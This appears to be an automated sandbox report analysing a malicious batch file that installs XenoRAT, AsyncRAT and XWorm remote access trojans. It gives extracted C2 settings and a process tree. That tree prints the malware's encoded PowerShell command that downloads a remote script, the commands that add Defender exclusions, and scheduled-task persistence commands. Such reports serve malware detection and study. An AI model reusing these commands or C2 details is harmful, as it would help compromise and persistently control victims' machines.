Analysis

  • max time kernel
    32s
  • max time network
    35s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-12-2024 12:49

General

  • Target

    virus_src.bat

  • Size

    720B

  • MD5

    25cc17794b4a00de0db1dc2f14580af4

  • SHA1

    f119d7d9bc38af460a8da42c9dbc09faa77130b1

  • SHA256

    847d7d889d1d5dc33f7c24d82dccc71cb9032fd743e8a52364dc5e0a07a03e69

  • SHA512

    70b49b9b7f7798f3ae15dfe100bf19eaf734de4c92b18b75295b06e455d64aee16879432ccfb3d95c78cbe301600504cfe485ddde59745dae62d64dd014b83ab

Malware Config

Extracted

Family

xenorat

C2

82.13.154.169

Mutex

09f0agdksogvisd0gdsjpogijdsihg89t2374ygh23b5023gyd79srtdfgbalkfnmvsakfnsajdio32y8956tyhtijdesaiosahf85295u3497348huasnfjasfa86a7s6g70duhgfdaguh7dsa6gdayghdughuiagfad6ga760ghad8ga6gad75asfgagnhalkjs90436r7tgafhafyasuft7as5asf083y5

Attributes
  • delay

    5000

  • install_path

    appdata

  • port

    4444

  • startup_name

    svchost

Extracted

Family

asyncrat

Botnet

CompPkgSrv

C2

82.13.154.169:4444

Attributes
  • delay

    3

  • install

    true

  • install_file

    CompPkgSrv.exe

  • install_folder

    %AppData%

aes.plain

Extracted

Family

xworm

C2

82.13.154.169:4444

Attributes
  • Install_directory

    %AppData%

  • install_file

    CompPkgSup.exe

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • Detect XenoRat Payload 2 IoCs
  • Detect Xworm Payload 2 IoCs
  • XenorRat

    XenorRat is a remote access trojan written in C#.

  • Xenorat family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Async RAT payload 1 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Start PowerShell.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 5 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 45 IoCs
  • Suspicious use of AdjustPrivilegeToken 12 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 43 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\virus_src.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2332
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Start-Process -Verb RunAs -FilePath 'C:\Users\Admin\AppData\Local\Temp\virus_src.bat' -ArgumentList "am_admin"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4556
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\virus_src.bat" am_admin
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4228
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -WindowStyle Hidden -NoLogo -enc KABpAHcAcgAgAGgAdAB0AHAAcwA6AC8ALwBwAGEAcwB0AGUAYgBpAG4ALgBjAG8AbQAvAHIAYQB3AC8AQQBlAHYAaAB1AEgAdgBaACkALgBjAG8AbgB0AGUAbgB0ACAAPgAgACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQBcAHMAeQBzAGIAbwBvAHQALgBwAHMAMQA=
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2500
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -WindowStyle Hidden -NoLogo -enc cABvAHcAZQByAHMAaABlAGwAbAAgAC0AbgBvAGUAeABpAHQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAAQgB5AHAAYQBzAHMAIAAtAEYAaQBsAGUAIAAkAGUAbgB2ADoATABPAEMAQQBMAEEAUABQAEQAQQBUAEEAXABzAHkAcwBiAG8AbwB0AC4AcABzADEADQAKAA==
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2028
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\sysboot.ps1
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1116
            • C:\Users\Admin\AppData\Local\svchost.exe
              "C:\Users\Admin\AppData\Local\svchost.exe"
              6⤵
              • Checks computer location settings
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:4960
              • C:\Users\Admin\AppData\Roaming\XenoManager\svchost.exe
                "C:\Users\Admin\AppData\Roaming\XenoManager\svchost.exe"
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4088
                • C:\Windows\SysWOW64\schtasks.exe
                  "schtasks.exe" /Create /TN "svchost" /XML "C:\Users\Admin\AppData\Local\Temp\tmpE7D0.tmp" /F
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:436
            • C:\Users\Admin\AppData\Local\CompPkgSrv.exe
              "C:\Users\Admin\AppData\Local\CompPkgSrv.exe"
              6⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2656
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "CompPkgSrv" /tr '"C:\Users\Admin\AppData\Roaming\CompPkgSrv.exe"' & exit
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:4020
                • C:\Windows\system32\schtasks.exe
                  schtasks /create /f /sc onlogon /rl highest /tn "CompPkgSrv" /tr '"C:\Users\Admin\AppData\Roaming\CompPkgSrv.exe"'
                  8⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:2436
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpE3E8.tmp.bat""
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:636
                • C:\Windows\system32\timeout.exe
                  timeout 3
                  8⤵
                  • Delays execution with timeout.exe
                  PID:4572
                • C:\Users\Admin\AppData\Roaming\CompPkgSrv.exe
                  "C:\Users\Admin\AppData\Roaming\CompPkgSrv.exe"
                  8⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:332
            • C:\Users\Admin\AppData\Local\CompPkgSup.exe
              "C:\Users\Admin\AppData\Local\CompPkgSup.exe"
              6⤵
              • Checks computer location settings
              • Drops startup file
              • Executes dropped EXE
              • Adds Run key to start application
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:1712
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\CompPkgSup.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:972
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'CompPkgSup.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:920
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\CompPkgSup.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1608
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'CompPkgSup.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4668
              • C:\Windows\System32\schtasks.exe
                "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "CompPkgSup" /tr "C:\Users\Admin\AppData\Roaming\CompPkgSup.exe"
                7⤵
                • Scheduled Task/Job: Scheduled Task
                PID:4604
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
      PID:1504

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\CompPkgSrv.exe

      Filesize

      63KB

      MD5

      a2cc522bd3b0806748349c386d613b00

      SHA1

      36f14471d1e307eec0af563f5c884acbffe65284

      SHA256

      a68a6d746ffbaf79d5e43b140217f521d68efa0191f9630258c57faf9591b70d

      SHA512

      c5f108ecc7ef45b465f07f3441ad00682a9ef9caa25783af1acf00777e087e483071e323b311581ed94c3cbbf740b776a13f29374ef5c42f795e36a13c36c959

    • C:\Users\Admin\AppData\Local\CompPkgSup.exe

      Filesize

      80KB

      MD5

      82ae01d348fce7ddf9f19ca5cb545ae1

      SHA1

      5b563cec5b49c7ec4082bf19aeccce9fc190bd2a

      SHA256

      4a322c3526936f921b75cadc7c2a827b8eeca29f6a929d9077751a3777ef378d

      SHA512

      6a8ba6397c38661df7eda751a0340df08645da88e3b4a563d9ba9e3849b7332677ca4acf3c41235883d75b737c5b3a91c871c95dc87808f753fa85717338b1ea

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\CompPkgSrv.exe.log

      Filesize

      871B

      MD5

      d58f949aad7df2e7b55248bfdfc6e1b8

      SHA1

      6713cad396b5808b66ede2dd9b169e00d5e5018f

      SHA256

      5e1611e4d915fd9759825811fa4463f09172889f85889a2942be1561948fab8a

      SHA512

      bdddb838108c4f3f0a7737703cbde935fe26aaea97459bb099c4c773c0789997283d7f20ac7ea4ac2aedef23515afc0b251b5b461aa12d3b7a60846b87b26e38

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      6cf293cb4d80be23433eecf74ddb5503

      SHA1

      24fe4752df102c2ef492954d6b046cb5512ad408

      SHA256

      b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

      SHA512

      0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\svchost.exe.log

      Filesize

      226B

      MD5

      916851e072fbabc4796d8916c5131092

      SHA1

      d48a602229a690c512d5fdaf4c8d77547a88e7a2

      SHA256

      7e750c904c43d27c89e55af809a679a96c0bb63fc511006ffbceffc2c7f6fb7d

      SHA512

      07ce4c881d6c411cac0b62364377e77950797c486804fb10d00555458716e3c47b1efc0d1f37e4cc3b7e6565bb402ca01c7ea8c963f9f9ace941a6e3883d2521

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      4e69ed58c5076e9f47a8ee9ce48083dd

      SHA1

      f0b0856088779689856481ac3bc2331004fb5d46

      SHA256

      50749ff8ec32a1882419f8adbbccb3cd4ff1d27ab9261b9c8b8c75f5eec310ca

      SHA512

      5866537bdd891e39aeb2d5bc21db92a40dfb96e216816905d8d6059a3e2fad50509763ffebda45c8246ad74f887033c56ebdd8da5f785010011091327cfa7a07

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      6975516edb8086851bbf301fdb124972

      SHA1

      c1e669c0596e8f732d922083412de1edde019116

      SHA256

      6b0a5b814d1069345a3d3705e1ff397a3e8f7f76947af1eb35d30dda2a4119fb

      SHA512

      ff3fc12b941dfd7cf95d671f18dc6884a3b96559172c987b78fb09b77b9d02bafa80894c9272abbcd2318cfe620588d4a1acb2a6a0f214f98772433ffa3ae1d2

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      fd98baf5a9c30d41317663898985593b

      SHA1

      ea300b99f723d2429d75a6c40e0838bf60f17aad

      SHA256

      9d97a5bbc88fdcceac25f293383f7e5ce242675460ffbfb2ee9090870c034e96

      SHA512

      bf4dbbd671b5d7afb326622a7c781f150860294d3dba7160330046c258c84a15981c70e50d84dc7faaa7cc8b8c90bf8df818b3f2d3806a8a3671dfe5e38fe7b0

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      64B

      MD5

      5caad758326454b5788ec35315c4c304

      SHA1

      3aef8dba8042662a7fcf97e51047dc636b4d4724

      SHA256

      83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

      SHA512

      4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      eaef2fd22964f0384c0786fe42e1bdf4

      SHA1

      f9c5f5a3862bc2b2ac880964b03461d3fe0a369c

      SHA256

      a848c493c132c070771c4c1fb73612fc322d63074c48476fbdce38d28fe451c8

      SHA512

      4fab0a6499eb2be406bfc67da714031e93c35d4d244d3e91c22fb7954e78d17a0523b911383f39debab2829591652e21244615164b1824a73302c733a5ea8846

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_v22amzvt.iby.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\tmpE3E8.tmp.bat

      Filesize

      154B

      MD5

      7667836fc12a55bcc37b9dc1e8b4a601

      SHA1

      752c3348a9edec3cfa482f38220694a2df8532e7

      SHA256

      afe487bd4258dd313276086624df3704a19cd6ad0738a02a5629214980d60153

      SHA512

      31ceb11aa4c222f584583882d68143c0eddcf1e0de481ae9cda84af2895de69577159d6fe95c127ea88d8a4585dedf52c13b84bdc5274fce2d4bb779252c43cf

    • C:\Users\Admin\AppData\Local\Temp\tmpE7D0.tmp

      Filesize

      1KB

      MD5

      9cb9f8ba5ba99c36d5ba7ee5a98f0bd9

      SHA1

      4bb53c5f5d4f208a4082b59b0c4b5185866cd874

      SHA256

      dd802183599f6403ef3ae4832781d6fa687765b45a1d19d2fba947c41a51ee3c

      SHA512

      eb8c9e078ba0b43d5256b7df4b4db16a45b954db118826b5629243025eeefa856e8c50d4451c13473290c2a707066c6bfa7173fc230daa13d87e7a4b7ec22f76

    • C:\Users\Admin\AppData\Local\svchost.exe

      Filesize

      46KB

      MD5

      31ee6e006c02625385210da20ce4b522

      SHA1

      e13ae10bd9300fd4608f8fc697e789b9712c1a75

      SHA256

      35edd93f3f9f6e21c6d88e50e475960290dacbba2c8d19cb74bb1b85fde24c2c

      SHA512

      46aca18f2af78401b3d39c28b2d87de4d44c7661bbc4a129f0af840075ad2e2becf4d144fc98292efb909763543c64a4801f921c1b71232ac2cc4911224c77e4

    • C:\Users\Admin\AppData\Local\sysboot.ps1

      Filesize

      1KB

      MD5

      81f7df2e0aa206d331d8987c1035cef1

      SHA1

      51e8454a79b2f8127d96663c6a74f88b1f139f2a

      SHA256

      4d2b4b4d6950791e6bcd8715c970bf7e19a0e33530818a6f17f602c785b0ec6a

      SHA512

      6defa54b76c38545de4b3b031b25191ddf67ff5e95c7e0004305012d9c87c8ea6dde10e30f9d1caceb70ad7caef61063ddc6aec40c755be96b8e730d712b132d

    • memory/920-142-0x0000020DF51D0000-0x0000020DF53EC000-memory.dmp

      Filesize

      2.1MB

    • memory/972-126-0x000001A574AB0000-0x000001A574CCC000-memory.dmp

      Filesize

      2.1MB

    • memory/1116-55-0x00000206D03D0000-0x00000206D0414000-memory.dmp

      Filesize

      272KB

    • memory/1116-124-0x00000206D0060000-0x00000206D027C000-memory.dmp

      Filesize

      2.1MB

    • memory/1116-106-0x00000206D0940000-0x00000206D09B6000-memory.dmp

      Filesize

      472KB

    • memory/1608-154-0x0000029B7E2A0000-0x0000029B7E4BC000-memory.dmp

      Filesize

      2.1MB

    • memory/1712-105-0x0000000000330000-0x000000000034A000-memory.dmp

      Filesize

      104KB

    • memory/2028-112-0x000002E730990000-0x000002E730BAC000-memory.dmp

      Filesize

      2.1MB

    • memory/2500-17-0x00007FFD9C520000-0x00007FFD9CFE1000-memory.dmp

      Filesize

      10.8MB

    • memory/2500-18-0x00007FFD9C520000-0x00007FFD9CFE1000-memory.dmp

      Filesize

      10.8MB

    • memory/2500-35-0x00007FFD9C520000-0x00007FFD9CFE1000-memory.dmp

      Filesize

      10.8MB

    • memory/2500-24-0x00007FFD9C520000-0x00007FFD9CFE1000-memory.dmp

      Filesize

      10.8MB

    • memory/2500-34-0x0000021177A00000-0x0000021177C1C000-memory.dmp

      Filesize

      2.1MB

    • memory/2500-30-0x0000021178900000-0x00000211790A6000-memory.dmp

      Filesize

      7.6MB

    • memory/2656-88-0x0000000000870000-0x0000000000886000-memory.dmp

      Filesize

      88KB

    • memory/4556-15-0x00007FFD9C520000-0x00007FFD9CFE1000-memory.dmp

      Filesize

      10.8MB

    • memory/4556-12-0x00007FFD9C520000-0x00007FFD9CFE1000-memory.dmp

      Filesize

      10.8MB

    • memory/4556-11-0x00007FFD9C520000-0x00007FFD9CFE1000-memory.dmp

      Filesize

      10.8MB

    • memory/4556-0-0x00007FFD9C523000-0x00007FFD9C525000-memory.dmp

      Filesize

      8KB

    • memory/4556-1-0x0000016CE4700000-0x0000016CE4722000-memory.dmp

      Filesize

      136KB

    • memory/4668-166-0x0000027AFBA10000-0x0000027AFBC2C000-memory.dmp

      Filesize

      2.1MB

    • memory/4960-68-0x0000000000570000-0x0000000000582000-memory.dmp

      Filesize

      72KB